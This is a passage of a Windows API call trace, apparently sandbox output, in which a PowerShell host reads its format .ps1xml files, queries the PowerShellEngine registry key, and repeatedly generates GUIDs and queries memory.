	[0412.580] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.580] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.580] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.580] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.580] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.580] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.580] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.581] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.581] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.581] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.581] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.581] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.581] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.581] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.582] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.582] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.582] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0xe67, lpOverlapped=0x0) returned 1
	[0412.582] ReadFile (in: hFile=0x2fc, lpBuffer=0x322ccbf, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322ccbf*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0412.582] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0412.582] SetErrorMode (uMode=0x1) returned 0x1
	[0412.582] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d100 | out: lpFileInformation=0x20d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0412.582] SetErrorMode (uMode=0x1) returned 0x1
	[0412.582] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1e8 | out: phkResult=0x20d1e8*=0x2fc) returned 0x0
	[0412.582] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d16c, lpData=0x0, lpcbData=0x20d168*=0x0 | out: lpType=0x20d16c*=0x1, lpData=0x0, lpcbData=0x20d168*=0x56) returned 0x0
	[0412.583] CoTaskMemAlloc (cb=0x5a) returned 0x3ba940
	[0412.583] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d13c, lpData=0x3ba940, lpcbData=0x20d138*=0x56 | out: lpType=0x20d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d138*=0x56) returned 0x0
	[0412.583] CoTaskMemFree (pv=0x3ba940) 
	[0412.583] RegCloseKey (hKey=0x2fc) returned 0x0
	[0412.584] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x3a031994, Data2=0xd6cb, Data3=0x4239, Data4=([0]=0x92, [1]=0x18, [2]=0xf, [3]=0x1b, [4]=0xcc, [5]=0xf0, [6]=0x2f, [7]=0x99))) returned 0x0
	[0412.584] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xe8d0041f, Data2=0xbaaf, Data3=0x4018, Data4=([0]=0x93, [1]=0x4e, [2]=0x54, [3]=0x8c, [4]=0xf0, [5]=0xa0, [6]=0xeb, [7]=0xc2))) returned 0x0
	[0412.584] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x23c5253c, Data2=0x5ced, Data3=0x4f81, Data4=([0]=0x90, [1]=0xaa, [2]=0xf2, [3]=0xfc, [4]=0x1e, [5]=0x4b, [6]=0xeb, [7]=0xeb))) returned 0x0
	[0412.584] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x6262344d, Data2=0x1cf5, Data3=0x4048, Data4=([0]=0xb8, [1]=0x27, [2]=0x80, [3]=0x44, [4]=0xfe, [5]=0x26, [6]=0xb3, [7]=0x7a))) returned 0x0
	[0412.584] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x39a1f61f, Data2=0xa419, Data3=0x4b4f, Data4=([0]=0x80, [1]=0x27, [2]=0xd8, [3]=0x31, [4]=0x83, [5]=0x30, [6]=0xee, [7]=0x51))) returned 0x0
	[0412.584] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x46503fa4, Data2=0x59d1, Data3=0x4de0, Data4=([0]=0xbb, [1]=0x3f, [2]=0xa2, [3]=0xc9, [4]=0x4, [5]=0x0, [6]=0xdd, [7]=0x91))) returned 0x0
	[0412.584] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xbe94bf98, Data2=0x3ac1, Data3=0x4d9b, Data4=([0]=0xae, [1]=0xc1, [2]=0xf8, [3]=0x3c, [4]=0xd6, [5]=0xbb, [6]=0x77, [7]=0xba))) returned 0x0
	[0412.584] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.585] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x6c6a6362, Data2=0x34ab, Data3=0x45d7, Data4=([0]=0xaf, [1]=0x57, [2]=0x26, [3]=0x65, [4]=0x19, [5]=0xd1, [6]=0xbc, [7]=0x45))) returned 0x0
	[0412.585] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x409f5469, Data2=0x593, Data3=0x459e, Data4=([0]=0xa3, [1]=0xe8, [2]=0xf4, [3]=0x51, [4]=0x4f, [5]=0x2e, [6]=0x69, [7]=0xd8))) returned 0x0
	[0412.585] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x5b700d91, Data2=0xefd3, Data3=0x4dd5, Data4=([0]=0x80, [1]=0xb7, [2]=0x15, [3]=0x55, [4]=0x9a, [5]=0x94, [6]=0x52, [7]=0x72))) returned 0x0
	[0412.585] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xbe7bc7af, Data2=0x74f8, Data3=0x4cf4, Data4=([0]=0x98, [1]=0x5c, [2]=0xc3, [3]=0x85, [4]=0xe9, [5]=0x80, [6]=0xea, [7]=0x6a))) returned 0x0
	[0412.585] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x55d9301e, Data2=0x6cda, Data3=0x419a, Data4=([0]=0xb8, [1]=0x60, [2]=0x96, [3]=0xd2, [4]=0x79, [5]=0x65, [6]=0xc1, [7]=0x4f))) returned 0x0
	[0412.585] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xdda92a5f, Data2=0xe2fb, Data3=0x478b, Data4=([0]=0x83, [1]=0x79, [2]=0x79, [3]=0xfe, [4]=0x50, [5]=0xf9, [6]=0x16, [7]=0xdb))) returned 0x0
	[0412.585] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x149a41d0, Data2=0xb49b, Data3=0x4c86, Data4=([0]=0x8d, [1]=0x60, [2]=0x1d, [3]=0x41, [4]=0x9c, [5]=0xde, [6]=0xed, [7]=0xe8))) returned 0x0
	[0412.585] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x7dbe5e34, Data2=0x8763, Data3=0x4380, Data4=([0]=0xb5, [1]=0x85, [2]=0x12, [3]=0x29, [4]=0x5b, [5]=0x60, [6]=0x4b, [7]=0xe7))) returned 0x0
	[0412.585] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x5290310e, Data2=0xe02, Data3=0x47db, Data4=([0]=0x98, [1]=0x10, [2]=0x53, [3]=0x93, [4]=0x35, [5]=0xf, [6]=0x49, [7]=0x4b))) returned 0x0
	[0412.585] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xef45f003, Data2=0xd103, Data3=0x461a, Data4=([0]=0x92, [1]=0x27, [2]=0x67, [3]=0x40, [4]=0x77, [5]=0xe9, [6]=0x13, [7]=0x54))) returned 0x0
	[0412.586] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xa4560889, Data2=0x150c, Data3=0x4dc6, Data4=([0]=0x93, [1]=0xc3, [2]=0xb0, [3]=0xa, [4]=0x49, [5]=0x2a, [6]=0x1d, [7]=0x46))) returned 0x0
	[0412.586] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xd656c58, Data2=0xa7cb, Data3=0x4ffc, Data4=([0]=0xbc, [1]=0x45, [2]=0x5, [3]=0x21, [4]=0x2d, [5]=0xa3, [6]=0x3d, [7]=0xea))) returned 0x0
	[0412.586] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.586] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.586] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.586] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x4bd4505, Data2=0x8afd, Data3=0x4d52, Data4=([0]=0xa6, [1]=0xe6, [2]=0x2a, [3]=0x8, [4]=0x7d, [5]=0xe7, [6]=0x3, [7]=0x72))) returned 0x0
	[0412.586] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xc39d2d43, Data2=0x2550, Data3=0x4522, Data4=([0]=0xb0, [1]=0xec, [2]=0x24, [3]=0xf7, [4]=0xa3, [5]=0x27, [6]=0x62, [7]=0xe1))) returned 0x0
	[0412.586] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xb8206927, Data2=0x4e4, Data3=0x46ec, Data4=([0]=0xb9, [1]=0x17, [2]=0xf9, [3]=0x10, [4]=0xdc, [5]=0xd, [6]=0x4f, [7]=0x7d))) returned 0x0
	[0412.586] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x139026f5, Data2=0x658f, Data3=0x40f1, Data4=([0]=0xab, [1]=0x50, [2]=0xcd, [3]=0x83, [4]=0x45, [5]=0x41, [6]=0x2e, [7]=0x5e))) returned 0x0
	[0412.587] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x5ff7c9a1, Data2=0x566, Data3=0x4dcd, Data4=([0]=0x88, [1]=0x32, [2]=0xb8, [3]=0xc6, [4]=0x16, [5]=0x9c, [6]=0x8e, [7]=0x79))) returned 0x0
	[0412.587] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x45d0743f, Data2=0xd4c, Data3=0x4229, Data4=([0]=0xb3, [1]=0x37, [2]=0x1a, [3]=0xc4, [4]=0x9f, [5]=0x36, [6]=0xe9, [7]=0x49))) returned 0x0
	[0412.587] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x9012937b, Data2=0xbff2, Data3=0x4dc2, Data4=([0]=0x80, [1]=0x97, [2]=0xb5, [3]=0xce, [4]=0xf1, [5]=0x89, [6]=0x62, [7]=0xa4))) returned 0x0
	[0412.587] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xd4445d5b, Data2=0x94e3, Data3=0x45bf, Data4=([0]=0x87, [1]=0x9, [2]=0x30, [3]=0xcc, [4]=0x2, [5]=0xe2, [6]=0x2, [7]=0x21))) returned 0x0
	[0412.587] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x9dd6494b, Data2=0x15dd, Data3=0x44f9, Data4=([0]=0x8b, [1]=0x78, [2]=0x21, [3]=0x2b, [4]=0x1c, [5]=0x41, [6]=0xb6, [7]=0x1e))) returned 0x0
	[0412.587] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x6a19bcb4, Data2=0xb3ca, Data3=0x4e3e, Data4=([0]=0xb0, [1]=0xd7, [2]=0x8c, [3]=0xbe, [4]=0x30, [5]=0xb7, [6]=0x2e, [7]=0xd6))) returned 0x0
	[0412.587] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xaad6b137, Data2=0x1afa, Data3=0x4cc0, Data4=([0]=0x93, [1]=0x5e, [2]=0x5d, [3]=0xa0, [4]=0x15, [5]=0x62, [6]=0x3b, [7]=0x6c))) returned 0x0
	[0412.587] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xfb1c6dd4, Data2=0xdd6d, Data3=0x4645, Data4=([0]=0xa6, [1]=0xf2, [2]=0x2b, [3]=0x81, [4]=0x14, [5]=0x46, [6]=0xf0, [7]=0x51))) returned 0x0
	[0412.587] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x45acbc0d, Data2=0xb51f, Data3=0x4bb8, Data4=([0]=0x93, [1]=0x1d, [2]=0xcd, [3]=0x7d, [4]=0xc6, [5]=0x11, [6]=0xb, [7]=0x65))) returned 0x0
	[0412.587] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.588] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x6c4f1b4c, Data2=0x79bf, Data3=0x4068, Data4=([0]=0x85, [1]=0x95, [2]=0x6b, [3]=0x14, [4]=0x21, [5]=0x93, [6]=0x90, [7]=0x5d))) returned 0x0
	[0412.588] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.588] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.589] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x11ec3f27, Data2=0x7a16, Data3=0x4557, Data4=([0]=0xb9, [1]=0x3a, [2]=0xb7, [3]=0x0, [4]=0xc7, [5]=0x85, [6]=0xbb, [7]=0x32))) returned 0x0
	[0412.589] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.589] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xa0af46bb, Data2=0x631e, Data3=0x47ab, Data4=([0]=0xa4, [1]=0x4d, [2]=0xf9, [3]=0xee, [4]=0x4d, [5]=0x82, [6]=0x86, [7]=0xb0))) returned 0x0
	[0412.589] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x362894d2, Data2=0xaded, Data3=0x4b89, Data4=([0]=0x8d, [1]=0xb4, [2]=0x37, [3]=0xf0, [4]=0xf1, [5]=0xfb, [6]=0xe8, [7]=0xfa))) returned 0x0
	[0412.589] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xb97201b3, Data2=0x5fa1, Data3=0x4720, Data4=([0]=0xa3, [1]=0x14, [2]=0x81, [3]=0x68, [4]=0xf8, [5]=0x61, [6]=0xd2, [7]=0x23))) returned 0x0
	[0412.589] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xbe0d7070, Data2=0xe7, Data3=0x4d49, Data4=([0]=0x80, [1]=0xcc, [2]=0x3e, [3]=0x3e, [4]=0xde, [5]=0x90, [6]=0x8c, [7]=0x40))) returned 0x0
	[0412.589] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xbfdbc5bd, Data2=0x326a, Data3=0x4deb, Data4=([0]=0xbf, [1]=0xff, [2]=0x65, [3]=0x9c, [4]=0x9f, [5]=0x12, [6]=0x84, [7]=0x49))) returned 0x0
	[0412.589] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xffbccf64, Data2=0x6ee7, Data3=0x4558, Data4=([0]=0xb8, [1]=0x5c, [2]=0x6a, [3]=0x5d, [4]=0xf8, [5]=0xd4, [6]=0x8, [7]=0x14))) returned 0x0
	[0412.589] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xc570f75f, Data2=0xd07e, Data3=0x4afb, Data4=([0]=0x81, [1]=0x6c, [2]=0xa5, [3]=0xde, [4]=0xc0, [5]=0x6e, [6]=0x9b, [7]=0x22))) returned 0x0
	[0412.589] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.590] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x7e2e3243, Data2=0xf7a0, Data3=0x4c70, Data4=([0]=0xa6, [1]=0xec, [2]=0xa1, [3]=0x62, [4]=0xc4, [5]=0x1b, [6]=0x26, [7]=0xbc))) returned 0x0
	[0412.590] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x15f4c6de, Data2=0xbb11, Data3=0x43fa, Data4=([0]=0x8c, [1]=0xe, [2]=0xfe, [3]=0xc, [4]=0x6f, [5]=0xca, [6]=0xd9, [7]=0x8d))) returned 0x0
	[0412.590] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x24a4439e, Data2=0xac4d, Data3=0x4601, Data4=([0]=0xa2, [1]=0x0, [2]=0x6, [3]=0x52, [4]=0x3b, [5]=0x6, [6]=0xa3, [7]=0xe7))) returned 0x0
	[0412.590] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xb7906033, Data2=0xa1e0, Data3=0x4a97, Data4=([0]=0xbf, [1]=0x9b, [2]=0xac, [3]=0x1b, [4]=0xe9, [5]=0x7b, [6]=0xaa, [7]=0x7))) returned 0x0
	[0412.590] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x77c2a1b6, Data2=0xa858, Data3=0x4977, Data4=([0]=0x81, [1]=0xc5, [2]=0x40, [3]=0x27, [4]=0xf7, [5]=0x64, [6]=0xd4, [7]=0xe2))) returned 0x0
	[0412.590] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.590] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x3ac9f3aa, Data2=0xf1ad, Data3=0x439c, Data4=([0]=0x8d, [1]=0x7b, [2]=0x98, [3]=0xc9, [4]=0x14, [5]=0xae, [6]=0x41, [7]=0xec))) returned 0x0
	[0412.590] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xc08803df, Data2=0x8a8e, Data3=0x4ed5, Data4=([0]=0x94, [1]=0x75, [2]=0x60, [3]=0x4, [4]=0x72, [5]=0x1c, [6]=0xf0, [7]=0xad))) returned 0x0
	[0412.590] VirtualQuery (in: lpAddress=0x20be30, lpBuffer=0x20ccf0, dwLength=0x30 | out: lpBuffer=0x20ccf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.590] VirtualQuery (in: lpAddress=0x20be30, lpBuffer=0x20ccf0, dwLength=0x30 | out: lpBuffer=0x20ccf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.591] VirtualQuery (in: lpAddress=0x20be30, lpBuffer=0x20ccf0, dwLength=0x30 | out: lpBuffer=0x20ccf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.591] VirtualQuery (in: lpAddress=0x20be30, lpBuffer=0x20ccf0, dwLength=0x30 | out: lpBuffer=0x20ccf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.591] SetErrorMode (uMode=0x1) returned 0x1
	[0412.591] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0412.591] SetErrorMode (uMode=0x1) returned 0x1
	[0412.591] GetFileType (hFile=0x2fc) returned 0x1
	[0412.591] ReadFile (in: hFile=0x2fc, lpBuffer=0x3392ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3392ca8*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.591] ReadFile (in: hFile=0x2fc, lpBuffer=0x3392ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3392ca8*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.591] ReadFile (in: hFile=0x2fc, lpBuffer=0x3392ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3392ca8*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.592] ReadFile (in: hFile=0x2fc, lpBuffer=0x3392ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3392ca8*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.592] ReadFile (in: hFile=0x2fc, lpBuffer=0x3392ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3392ca8*, lpNumberOfBytesRead=0x20d158*=0x8b4, lpOverlapped=0x0) returned 1
	[0412.592] ReadFile (in: hFile=0x2fc, lpBuffer=0x33920c4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x33920c4*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
